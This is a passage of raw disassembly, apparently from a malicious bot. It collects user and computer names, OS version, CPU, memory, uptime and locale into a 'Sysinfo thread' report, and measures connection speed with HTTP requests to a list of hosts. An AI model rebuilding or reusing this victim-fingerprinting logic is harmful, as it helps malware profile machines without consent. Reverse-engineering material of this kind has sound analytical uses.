call sub_4053FF
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40547A
loc_4054AD: ; CODE XREF: sub_40543F+30�j
push esi
push [ebp+arg_10]
call sub_4053FF
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
loc_4054BE: ; CODE XREF: sub_40543F+3D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40543F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054C3 proc near ; CODE XREF: sub_405580+81�p
; sub_405580+97�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov dl, [eax]
cmp dl, 72h
jnz short loc_4054F7
cmp byte ptr [eax+1], 0
jnz short loc_4054F7
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_40AADE
pop ecx
pop ecx
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
jmp loc_40557B
; ---------------------------------------------------------------------------
loc_4054F7: ; CODE XREF: sub_4054C3+B�j
; sub_4054C3+11�j
cmp dl, 73h
jz short loc_405501
cmp dl, 69h
jnz short loc_405560
loc_405501: ; CODE XREF: sub_4054C3+37�j
cmp byte ptr [eax+1], 0
jnz short loc_405560
mov ecx, [ebp+arg_0]
mov al, [ecx]
test al, al
jz short loc_405543
cmp [ebp+arg_10], 0
jz short loc_40553C
push ebx
push ecx
call sub_41088C ; atoi
mov ebx, eax
push 0Ah
push [ebp+arg_C]
inc bl
movzx eax, bl
push eax
call sub_410C9A ; _itoa
add esp, 10h
xor eax, eax
test bl, bl
setz al
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40553C: ; CODE XREF: sub_4054C3+51�j
test al, al
jz short loc_405543
push ecx
jmp short loc_405552
; ---------------------------------------------------------------------------
loc_405543: ; CODE XREF: sub_4054C3+4B�j
; sub_4054C3+7B�j
cmp dl, 69h
jnz short loc_40554F
push offset dword_412F1C
jmp short loc_405552
; ---------------------------------------------------------------------------
loc_40554F: ; CODE XREF: sub_4054C3+83�j
push [ebp+arg_8]
loc_405552: ; CODE XREF: sub_4054C3+7E�j
; sub_4054C3+8A�j
push [ebp+arg_C]
call sub_410820 ; _mbscpy
pop ecx
xor eax, eax
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405560: ; CODE XREF: sub_4054C3+3C�j
; sub_4054C3+42�j
test dl, dl
jnz short loc_40556B
mov eax, [ebp+arg_0]
cmp [eax], dl
jz short loc_40556E
loc_40556B: ; CODE XREF: sub_4054C3+9F�j
push eax
jmp short loc_405571
; ---------------------------------------------------------------------------
loc_40556E: ; CODE XREF: sub_4054C3+A6�j
push [ebp+arg_8]
loc_405571: ; CODE XREF: sub_4054C3+A9�j
push [ebp+arg_C]
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_40557B: ; CODE XREF: sub_4054C3+2F�j
mov eax, [ebp+arg_10]
pop ebp
retn
sub_4054C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405580 proc near ; CODE XREF: sub_40E18A+137�p
; sub_40E18A+2F4�p
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_0]
call sub_40543F
add esp, 14h
test eax, eax
jz short loc_4055EB
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_4]
call sub_40543F
add esp, 14h
test eax, eax
jz short loc_4055EB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_24]
push eax
push offset dword_418C78
call sub_40543F
add esp, 14h
test eax, eax
jz short loc_4055EB
cmp byte ptr [ebp+arg_0], 0
jnz short loc_4055EF
loc_4055EB: ; CODE XREF: sub_405580+23�j
; sub_405580+42�j ...
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4055EF: ; CODE XREF: sub_405580+69�j
lea eax, [ebp+var_30]
push 1
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_8]
push eax
call sub_4054C3
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_14]
push eax
call sub_4054C3
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_20]
push eax
call sub_4054C3
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_4054C3
add esp, 50h
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3C]
push eax
push offset loc_412F20
push [ebp+arg_8]
call sub_410844 ; sprintf
add esp, 18h
push 1
pop eax
leave
retn
sub_405580 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405670 proc near ; CODE XREF: sub_40E18A+E6�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call sub_40543F
add esp, 14h
test eax, eax
jz short loc_4056B6
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
push offset dword_418C78
call sub_40543F
add esp, 14h
test eax, eax
jnz short loc_4056BA
loc_4056B6: ; CODE XREF: sub_405670+23�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4056BA: ; CODE XREF: sub_405670+44�j
cmp [ebp+var_10], 0
jnz short loc_4056CF
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4056CF: ; CODE XREF: sub_405670+4E�j
cmp [ebp+var_C], 0
jnz short loc_4056E4
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4056E4: ; CODE XREF: sub_405670+63�j
cmp [ebp+var_8], 0
jnz short loc_4056F9
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4056F9: ; CODE XREF: sub_405670+78�j
cmp [ebp+var_4], 0
jnz short loc_40570E
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_4]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_40570E: ; CODE XREF: sub_405670+8D�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_10]
push eax
push offset loc_412F20
push [ebp+arg_0]
call sub_410844 ; sprintf
add esp, 18h
push 1
pop eax
leave
retn
sub_405670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405733 proc near ; CODE XREF: sub_4051D2+41�p
; sub_4051D2+75�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_405742
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_405742: ; CODE XREF: sub_405733+8�j
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov ecx, [eax]
mov edi, [ebp+arg_4]
mov al, [ecx]
test al, al
jz short loc_405776
mov bl, [edi]
loc_405755: ; CODE XREF: sub_405733+41�j
test bl, bl
mov esi, edi
jz short loc_405769
mov dl, bl
loc_40575D: ; CODE XREF: sub_405733+34�j
cmp dl, al
jz short loc_405769
mov dl, [esi+1]
inc esi
test dl, dl
jnz short loc_40575D
loc_405769: ; CODE XREF: sub_405733+26�j
; sub_405733+2C�j
cmp byte ptr [esi], 0
jz short loc_405776
mov al, [ecx+1]
inc ecx
test al, al
jnz short loc_405755
loc_405776: ; CODE XREF: sub_405733+1E�j
; sub_405733+39�j
cmp byte ptr [ecx], 0
mov edx, ecx
mov esi, edi
jz short loc_405799
loc_40577F: ; CODE XREF: sub_405733+5E�j
mov al, [edx]
cmp al, [esi]
jz short loc_405795
inc esi
cmp byte ptr [esi], 0
jnz short loc_40578E
mov esi, edi
inc edx
loc_40578E: ; CODE XREF: sub_405733+56�j
cmp byte ptr [edx], 0
jnz short loc_40577F
jmp short loc_405799
; ---------------------------------------------------------------------------
loc_405795: ; CODE XREF: sub_405733+50�j
and byte ptr [edx], 0
inc edx
loc_405799: ; CODE XREF: sub_405733+4A�j
; sub_405733+60�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
mov [eax], edx
mov eax, ecx
sub eax, edx
neg eax
sbb eax, eax
and eax, ecx
pop ebp
retn
sub_405733 endp
; =============== S U B R O U T I N E =======================================
sub_4057AD proc near ; CODE XREF: sub_4057B0:loc_4057BA�p
; sub_4057B0+1E�p
rdtsc
retn
sub_4057AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4057B0 proc near ; CODE XREF: sub_4058D7+271�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor esi, esi
loc_4057BA: ; CODE XREF: sub_4057B0+42�j
; sub_4057B0+4C�j
call sub_4057AD
push 3E8h
mov edi, eax
mov ebx, edx
call ds:dword_4110A4 ; Sleep
call sub_4057AD
sub eax, edi
push esi
sbb edx, ebx
push 186A0h
push edx
push eax
call sub_410980
push esi
push 0Ah
push edx
push eax
call sub_410980
cmp edx, esi
mov edi, eax
ja short loc_4057BA
jb short loc_4057FE
cmp edi, 0F4240h
ja short loc_4057BA
loc_4057FE: ; CODE XREF: sub_4057B0+44�j
push esi
push 64h
push edx
push edi
call sub_410900
push 64h
mov ecx, eax
cmp edx, esi
pop eax
mov [ebp+var_4], esi
ja short loc_405875
jb short loc_40581B
cmp ecx, 50h
jnb short loc_405821
loc_40581B: ; CODE XREF: sub_4057B0+64�j
push 4Bh
mov [ebp+var_4], esi
pop eax
loc_405821: ; CODE XREF: sub_4057B0+69�j
cmp edx, esi
ja short loc_405875
jb short loc_40582C
cmp ecx, 47h
jnb short loc_405832
loc_40582C: ; CODE XREF: sub_4057B0+75�j
push 42h
mov [ebp+var_4], esi
pop eax
loc_405832: ; CODE XREF: sub_4057B0+7A�j
cmp edx, esi
ja short loc_405875
jb short loc_40583D
cmp ecx, 37h
jnb short loc_405843
loc_40583D: ; CODE XREF: sub_4057B0+86�j
push 32h
mov [ebp+var_4], esi
pop eax
loc_405843: ; CODE XREF: sub_4057B0+8B�j
cmp edx, esi
ja short loc_405875
jb short loc_40584E
cmp ecx, 26h
jnb short loc_405854
loc_40584E: ; CODE XREF: sub_4057B0+97�j
push 21h
mov [ebp+var_4], esi
pop eax
loc_405854: ; CODE XREF: sub_4057B0+9C�j
cmp edx, esi
ja short loc_405875
jb short loc_40585F
cmp ecx, 1Eh
jnb short loc_405865
loc_40585F: ; CODE XREF: sub_4057B0+A8�j
push 19h
mov [ebp+var_4], esi
pop eax
loc_405865: ; CODE XREF: sub_4057B0+AD�j
cmp edx, esi
ja short loc_405875
jb short loc_405870
cmp ecx, 0Ah
jnb short loc_405875
loc_405870: ; CODE XREF: sub_4057B0+B9�j
xor eax, eax
mov [ebp+var_4], esi
loc_405875: ; CODE XREF: sub_4057B0+62�j
; sub_4057B0+73�j ...
sub eax, ecx
add eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4057B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40587E proc near ; CODE XREF: sub_4088FC+15A�p
; sub_408F9D+2AF�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, ds:dword_411038
push 1Fh
push esi
push 7
push 400h
call edi ; GetLocaleInfoA
neg eax
sbb eax, eax
mov byte ptr [esi+3], 0
neg eax
mov [ebp+arg_0], eax
jz short loc_4058BD
push offset off_4130CC
push esi
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz short loc_4058BD
push 1
pop eax
jmp short loc_4058D3
; ---------------------------------------------------------------------------
loc_4058BD: ; CODE XREF: sub_40587E+27�j
; sub_40587E+38�j
push 1Fh
push esi
push 7
push 800h
call edi ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
and byte ptr [esi+3], 0
loc_4058D3: ; CODE XREF: sub_40587E+3D�j
pop edi
pop esi
pop ebp
retn
sub_40587E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4058D7 proc near ; DATA XREF: sub_405BB3+29�o
var_72C = byte ptr -72Ch
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = byte ptr -178h
var_105 = byte ptr -105h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_50 = byte ptr -50h
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 72Ch
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
lea eax, [ebp+var_70]
push eax
call ds:dword_41107C ; GlobalMemoryStatus
mov eax, [ebp+var_68]
lea esi, [eax+100000h]
mov eax, [ebp+var_64]
add eax, 100000h
shr eax, 14h
shr esi, 14h
mov [ebp+var_24], eax
call sub_40639B
mov ecx, 15180h
xor edx, edx
mov ebx, ecx
mov edi, eax
div ebx
xor edx, edx
push 3Ch
mov [ebp+var_8], 15h
mov [ebp+var_C], 10h
mov [ebp+var_18], eax
mov eax, edi
div ecx
mov ecx, 0E10h
mov ebx, ecx
mov edi, edx
xor edx, edx
mov eax, edi
div ebx
xor edx, edx
mov [ebp+var_10], eax
mov eax, edi
div ecx
pop ecx
mov eax, edx
xor edx, edx
div ecx
mov [ebp+arg_0], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_50]
push eax
call ds:dword_411018 ; GetUserNameA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_38]
push eax
call ds:dword_411030 ; GetComputerNameA
push 24h
xor eax, eax
pop ecx
lea edi, [ebp+var_100]
mov [ebp+var_104], 94h
rep stosd
lea eax, [ebp+var_104]
push eax
call ds:dword_411034 ; GetVersionExA
cmp [ebp+var_100], 4
mov edi, offset a? ; "?"
mov [ebp+var_1C], offset aNoSp ; "no SP"
jnz short loc_405A0F
cmp [ebp+var_FC], 0
jnz short loc_4059EF
cmp [ebp+var_F4], 1
jnz short loc_4059DF
mov edi, offset a95 ; "95"
loc_4059DF: ; CODE XREF: sub_4058D7+101�j
cmp [ebp+var_F4], 2
jnz short loc_405A61
mov edi, offset aNt ; "NT"
jmp short loc_405A4F
; ---------------------------------------------------------------------------
loc_4059EF: ; CODE XREF: sub_4058D7+F8�j
cmp [ebp+var_FC], 0Ah
jnz short loc_4059FF
mov edi, offset a98 ; "98"
jmp short loc_405A46
; ---------------------------------------------------------------------------
loc_4059FF: ; CODE XREF: sub_4058D7+11F�j
cmp [ebp+var_FC], 5Ah
jnz short loc_405A46
mov edi, offset aMe ; "ME"
jmp short loc_405A46
; ---------------------------------------------------------------------------
loc_405A0F: ; CODE XREF: sub_4058D7+EF�j
cmp [ebp+var_100], 5
jnz short loc_405A46
cmp [ebp+var_FC], 0
jnz short loc_405A28
mov edi, offset a2000 ; "2000"
jmp short loc_405A46
; ---------------------------------------------------------------------------
loc_405A28: ; CODE XREF: sub_4058D7+148�j
cmp [ebp+var_FC], 1
jnz short loc_405A38
mov edi, offset aXp ; "XP"
jmp short loc_405A46
; ---------------------------------------------------------------------------
loc_405A38: ; CODE XREF: sub_4058D7+158�j
cmp [ebp+var_FC], 2
jnz short loc_405A46
mov edi, offset a2003 ; "2003"
loc_405A46: ; CODE XREF: sub_4058D7+126�j
; sub_4058D7+12F�j ...
cmp [ebp+var_F4], 2
jnz short loc_405A61
loc_405A4F: ; CODE XREF: sub_4058D7+116�j
cmp [ebp+var_F0], 0
jz short loc_405A61
lea eax, [ebp+var_F0]
mov [ebp+var_1C], eax
loc_405A61: ; CODE XREF: sub_4058D7+10F�j
; sub_4058D7+176�j ...
call sub_403342
test eax, eax
mov [ebp+var_14], offset aYes ; "Yes"
jnz short loc_405A78
mov [ebp+var_14], offset aNo ; "No"
loc_405A78: ; CODE XREF: sub_4058D7+198�j
and [ebp+var_178], 0
and [ebp+var_105], 0
xor eax, eax
cpuid
mov [ebp+var_184], ebx
mov [ebp+var_180], edx
mov [ebp+var_17C], ecx
lea eax, [ebp+var_4]
xor ebx, ebx
push eax
push 20019h
push ebx
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
mov [ebp+var_4], ebx
call ds:dword_411000 ; RegOpenKeyExA
test eax, eax
jnz short loc_405B07
lea eax, [ebp+var_28]
mov [ebp+var_20], ebx
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_20]
push eax
push ebx
push offset aProcessornames ; "ProcessorNameString"
mov [ebp+var_28], 80h
push [ebp+var_4]
call ds:dword_41100C ; RegQueryValueExA
test eax, eax
jnz short loc_405AFE
push 1
lea eax, [ebp+var_184]
push 1
push eax
call sub_4053BA
add esp, 0Ch
loc_405AFE: ; CODE XREF: sub_4058D7+212�j
push [ebp+var_4]
call ds:dword_411028 ; RegCloseKey
loc_405B07: ; CODE XREF: sub_4058D7+1E6�j
cmp [ebp+arg_0], 1
mov ecx, offset byte_417B60
mov eax, offset dword_4131C0
mov ebx, ecx
jz short loc_405B1B
mov ebx, eax
loc_405B1B: ; CODE XREF: sub_4058D7+240�j
cmp [ebp+var_10], 1
mov edx, ecx
jz short loc_405B25
mov edx, eax
loc_405B25: ; CODE XREF: sub_4058D7+24A�j
cmp [ebp+var_18], 1
jnz short loc_405B2D
mov eax, ecx
loc_405B2D: ; CODE XREF: sub_4058D7+252�j
lea ecx, [ebp+var_50]
push ecx
lea ecx, [ebp+var_38]
push ecx
push ebx
push [ebp+arg_0]
push edx
push [ebp+var_10]
push eax
push [ebp+var_18]
push [ebp+var_14]
push esi
push [ebp+var_24]
call sub_4057B0
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_72C]
push [ebp+var_F8]
push [ebp+var_FC]
push [ebp+var_100]
push [ebp+var_1C]
push edi
push offset dword_4130D0
push 400h
push eax
call sub_41089E ; _snprintf
add esp, 54h
lea eax, [ebp+var_72C]
push eax
lea eax, [ebp+var_328]
push offset dword_412B30
push eax
call sub_408D50
push [ebp+var_32C]
call sub_406753
add esp, 10h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4058D7 endp
; =============== S U B R O U T I N E =======================================
sub_405BB3 proc near ; CODE XREF: sub_40735A+FFE�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_405BE9
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push esi
push offset sub_4058D7
call sub_40663C
add esp, 10h
loc_405BE9: ; CODE XREF: sub_405BB3+10�j
pop esi
retn
sub_405BB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BEB proc near ; CODE XREF: sub_405C57+A�p
; sub_405C57+18�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_20]
push eax
call sub_40AC4E
call sub_41084A ; clock
mov edi, eax
push 7D0h
push 0
lea eax, [ebp+var_20]
push offset a80 ; "80"
push eax
call sub_403BBB
mov esi, eax
push esi
call sub_403D49
add esp, 20h
test esi, esi
jnz short loc_405C3A
mov eax, 3E8h
jmp short loc_405C53
; ---------------------------------------------------------------------------
loc_405C3A: ; CODE XREF: sub_405BEB+46�j
call sub_41084A ; clock
mov ecx, eax
mov eax, 3E8h
sub ecx, edi
cmp ecx, eax
jnb short loc_405C53
call sub_41084A ; clock
sub eax, edi
loc_405C53: ; CODE XREF: sub_405BEB+4D�j
; sub_405BEB+5F�j
pop edi
pop esi
leave
retn
sub_405BEB endp
; =============== S U B R O U T I N E =======================================
sub_405C57 proc near ; CODE XREF: sub_405E4E:loc_405F89�p
; sub_40849F+15C�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push (offset loc_412F2B+1)
call sub_405BEB
mov esi, eax
mov [esp+18h+var_18], offset dword_412F38
call sub_405BEB
mov edi, eax
mov [esp+18h+var_18], offset dword_412F50
call sub_405BEB
mov ebx, eax
mov [esp+18h+var_18], offset dword_412F5C
call sub_405BEB
mov ebp, eax
mov [esp+18h+var_18], offset dword_412F6C
call sub_405BEB
mov [esp+18h+var_4], eax
mov [esp+18h+var_18], offset dword_412F7C
call sub_405BEB
add eax, [esp+18h+var_4]
pop ecx
push 6
xor edx, edx
add eax, ebp
pop ecx
add eax, ebx
add eax, edi
pop edi
add eax, esi
pop esi
pop ebp
pop ebx
div ecx
pop ecx
retn
sub_405C57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CC8 proc near ; CODE XREF: sub_405E4E:loc_405FAE�p
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 414h
push ebx
xor ebx, ebx
xor eax, eax
cmp off_412F90, ebx
push esi
push edi
jz short loc_405CED
mov ecx, offset off_412F90
loc_405CE5: ; CODE XREF: sub_405CC8+23�j
add ecx, 4
inc eax
cmp [ecx], ebx
jnz short loc_405CE5
loc_405CED: ; CODE XREF: sub_405CC8+16�j
shr eax, 1
mov [ebp+var_4], ebx
lea edi, [eax-1]
jmp short loc_405CF9
; ---------------------------------------------------------------------------
loc_405CF7: ; CODE XREF: sub_405CC8+A0�j
xor ebx, ebx
loc_405CF9: ; CODE XREF: sub_405CC8+2D�j
push edi
push ebx
call sub_40AADE
mov esi, eax
lea eax, [ebp+var_114]
shl esi, 3
push off_412F90[esi]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_114]
push eax
call sub_40AC4E
push off_412F94[esi]
lea eax, [ebp+var_214]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_214]
push eax
call sub_40AC4E
push 2710h
push ebx
lea eax, [ebp+var_114]
push offset a80 ; "80"
push eax
call sub_403BBB
mov ebx, eax
add esp, 30h
test ebx, ebx
jnz short loc_405D6F
inc [ebp+var_4]
cmp [ebp+var_4], 3
jb short loc_405CF7
loc_405D6A: ; CODE XREF: sub_405CC8+181�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405D6F: ; CODE XREF: sub_405CC8+97�j
lea eax, [ebp+var_114]
mov esi, 200h
push eax
lea eax, [ebp+var_214]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
lea eax, [ebp+var_414]
push esi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_414]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_414]
push eax
push ebx
call sub_403D54
add esp, 24h
call sub_41084A ; clock
and [ebp+var_4], 0
mov dword ptr [ebp+var_14+4], eax
mov edi, 1388h
loc_405DC2: ; CODE XREF: sub_405CC8+134�j
; sub_405CC8+147�j
push edi
lea eax, [ebp+var_414]
push esi
push eax
push ebx
call sub_403DAD
add esp, 10h
mov dword ptr [ebp+var_C+4], eax
test eax, eax
jz short loc_405DFE
cmp eax, 0FFFFFFFFh
jz short loc_405DFE
call sub_41084A ; clock
sub eax, dword ptr [ebp+var_14+4]
cmp eax, edi
jnb short loc_405DFE
mov eax, [ebp+var_4]
cmp eax, 100000h
jnb short loc_405DFE
add eax, dword ptr [ebp+var_C+4]
mov [ebp+var_4], eax
jmp short loc_405DC2
; ---------------------------------------------------------------------------
loc_405DFE: ; CODE XREF: sub_405CC8+111�j
; sub_405CC8+116�j ...
mov eax, [ebp+var_4]
cmp eax, 2000h
jnb short loc_405E11
push ebx
call sub_403D27
pop ecx
jmp short loc_405DC2
; ---------------------------------------------------------------------------
loc_405E11: ; CODE XREF: sub_405CC8+13E�j
and dword ptr [ebp+var_C+4], 0
mov dword ptr [ebp+var_C], eax
fild [ebp+var_C]
fstp dword ptr [ebp+var_C+4]
call sub_41084A ; clock
sub eax, dword ptr [ebp+var_14+4]
and dword ptr [ebp+var_14+4], 0
mov dword ptr [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:flt_411280
fdivr dword ptr [ebp+var_C+4]
call sub_4109E8 ; _ftol
push ebx
mov esi, eax
call sub_403D27
pop ecx
mov eax, esi
jmp loc_405D6A
sub_405CC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E4E proc near ; DATA XREF: sub_40605E+29�o
var_A80 = qword ptr -0A80h
var_A54 = byte ptr -0A54h
var_654 = byte ptr -654h
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_A8 = byte ptr -0A8h
var_28 = byte ptr -28h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A54h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
mov esi, offset dword_418C78
lea eax, [ebp+var_654]
push esi
push eax
call sub_410820 ; _mbscpy
add esp, 18h
lea eax, [ebp+var_C]
xor edi, edi
push eax
push edi
push edi
push esi
call dword_417BB4 ; getaddrinfo
test eax, eax
jnz short loc_405EC6
push 1
push edi
push edi
lea eax, [ebp+var_654]
push 401h
push eax
mov eax, [ebp+var_C]
push dword ptr [eax+10h]
push dword ptr [eax+18h]
call dword_417BB8 ; getnameinfo
push [ebp+var_C]
call dword_417BBC ; freeaddrinfo
loc_405EC6: ; CODE XREF: sub_405E4E+4E�j
call sub_40640D
mov ecx, 15180h
xor edx, edx
mov ebx, ecx
mov esi, eax
div ebx
xor edx, edx
push 3Ch
mov dword ptr [ebp+var_8+4], eax
mov eax, esi
div ecx
mov ecx, 0E10h
mov ebx, ecx
mov esi, edx
xor edx, edx
mov eax, esi
div ebx
xor edx, edx
mov [ebp+var_14], eax
mov eax, esi
div ecx
pop ecx
mov esi, offset aUnknown_0 ; "Unknown"
push esi
mov eax, edx
xor edx, edx
div ecx
mov [ebp+arg_0], eax
lea eax, [ebp+var_A8]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_28]
push esi
push eax
call sub_410820 ; _mbscpy
mov eax, dword_417BAC
add esp, 10h
cmp eax, edi
jz short loc_405F61
push edi
lea ecx, [ebp+var_A8]
push 80h
push ecx
lea ecx, [ebp+var_1C]
push ecx
call eax ; InternetGetConnectedStateEx
test eax, eax
jz short loc_405F61
test [ebp+var_1C], 1
jz short loc_405F51
push offset aModem ; "Modem"
jmp short loc_405F56
; ---------------------------------------------------------------------------
loc_405F51: ; CODE XREF: sub_405E4E+FA�j
push offset aLan ; "LAN"
loc_405F56: ; CODE XREF: sub_405E4E+101�j
lea eax, [ebp+var_28]
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_405F61: ; CODE XREF: sub_405E4E+DD�j
; sub_405E4E+F4�j
call sub_4033B0
mov edi, offset aYes ; "Yes"
mov esi, offset aNo ; "No"
test eax, eax
mov [ebp+var_18], edi
jnz short loc_405F7A
mov [ebp+var_18], esi
